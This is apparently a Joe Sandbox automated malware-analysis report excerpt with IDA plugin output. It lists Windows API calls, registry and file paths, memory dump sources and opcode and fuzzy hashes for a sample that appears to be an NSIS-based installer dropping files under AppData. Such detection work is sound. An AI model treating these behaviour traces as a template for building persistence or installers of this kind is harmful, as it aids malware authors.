                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                            APIs
                                                                              • Part of subcall function 00405BC8: CharNextW.USER32(?,?,00425EF0,?,00405C3C,00425EF0,00425EF0,?,?,774D3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405BD6
                                                                              • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                                                              • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                              • Part of subcall function 0040577F: CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057C2
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer,?,00000000,000000F0), ref: 0040164D
                                                                            Strings
                                                                            • C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer, xrefs: 00401640
                                                                            APIs
                                                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,0040638E,80000002), ref: 00406160
                                                                            • RegCloseKey.ADVAPI32(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,fusionsenergiens), ref: 0040616B
                                                                            APIs
                                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                                                            • CloseHandle.KERNEL32(?), ref: 00405867
                                                                            Strings
                                                                            • Error launching installer, xrefs: 00405844
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: Error launching installer
                                                                            • API String ID: 3712363035-66219284
                                                                            • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                            • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                                                            • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                                                            • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                            • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                                                            • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                                                            • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                            • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                                                            • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                                                            • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                            • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                                                            • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                                            • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                            • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                                                            • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                                                            • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                            • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                                                            • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                                            • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                            • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                                                            • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                                                            • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                            • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                                                            • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                                                            • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402057
                                                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,fusionsenergiens,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                              • Part of subcall function 004052B0: lstrcatW.KERNEL32(fusionsenergiens,00403233,00403233,fusionsenergiens,00000000,00410EA0,00403094), ref: 0040530B
                                                                              • Part of subcall function 004052B0: SetWindowTextW.USER32(fusionsenergiens,fusionsenergiens), ref: 0040531D
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402068
                                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 334405425-0
                                                                            • Opcode ID: d1a534bdac8ab4a375a67c0f9322d902bd9b954321ea6e1800b8380d6ebd8416
                                                                            • Instruction ID: 1b7e6cc8a89e608973352e39bc6088f07de5daa2050f71ccd5864d961518f39c
                                                                            • Opcode Fuzzy Hash: d1a534bdac8ab4a375a67c0f9322d902bd9b954321ea6e1800b8380d6ebd8416
                                                                            • Instruction Fuzzy Hash: 0321B331900218EBCF216FA5CE4DAAE7A70AF04354F60413BF511B51E1DBBD4951DA6E
                                                                            APIs
                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                                                            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402538
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\investeringsbelbenes\redocking.gal,00000000,00000011,00000002), ref: 00402551
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Enum$CloseValue
                                                                            • String ID:
                                                                            • API String ID: 397863658-0
                                                                            • Opcode ID: 2dbb90817d3466964644462ae49b83c0ff048dcda9f110866345d3753b39abd0
                                                                            • Instruction ID: caf525ecc09255a736170ff5365d3a7771f075d5505ff7476addd39d58865d97
                                                                            • Opcode Fuzzy Hash: 2dbb90817d3466964644462ae49b83c0ff048dcda9f110866345d3753b39abd0
                                                                            • Instruction Fuzzy Hash: 4A017171904104EFE7159FA5DE89ABFB6BCEF44348F10403EF105A62D0DAB84E459B69
                                                                            APIs
                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\investeringsbelbenes\redocking.gal,00000000,00000011,00000002), ref: 00402551
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue
                                                                            • String ID:
                                                                            • API String ID: 3356406503-0
                                                                            • Opcode ID: f85ecda1541d48c2eacd468b36386ab34562a3993df006b1de11f0f736a539f7
                                                                            • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
                                                                            • Opcode Fuzzy Hash: f85ecda1541d48c2eacd468b36386ab34562a3993df006b1de11f0f736a539f7
                                                                            • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
                                                                            APIs
                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000005.00000002.1308804129.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308856043.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000422000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000427000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042C000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000042F000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.0000000000435000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1308879767.000000000045E000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000005.00000002.1309502773.0000000000462000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                            • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                                            • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                                            • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                                            APIs
                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteValue
                                                                            • String ID:
                                                                            • API String ID: 2831762973-0
                                                                            • Opcode ID: 15234d5bd8e4dcd6d792e6f63076afaa231503a3d6edbacb390880a8125533c4
                                                                            • Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
                                                                            • Opcode Fuzzy Hash: 15234d5bd8e4dcd6d792e6f63076afaa231503a3d6edbacb390880a8125533c4
                                                                            • Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D
                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 00405393
                                                                              • Part of subcall function 0040422D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 004053DF
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeMessageSendUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2896919175-0
                                                                            • Opcode ID: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                                                            • Instruction ID: 26d04017d7367bbfa1c35918477487f98c57589759ea251963dc576d4d611ade
                                                                            • Opcode Fuzzy Hash: c4d291e73dbe556e25b8cdf62f2c5066ac8ca80256b4e3a4ac09864a90cce089
                                                                            • Instruction Fuzzy Hash: 98F09072610A00DBE2115754AD01B167764EB80395F15447EFE84A23E196BA48128B7E
                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1308833301.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnableShow
                                                                            • String ID:
                                                                            • API String ID: 1136574915-0
                                                                            • Opcode ID: 009c69f53e9950683efb76fdc5a6e8cdc372d449b4d3b3bde035592a44acf5fc
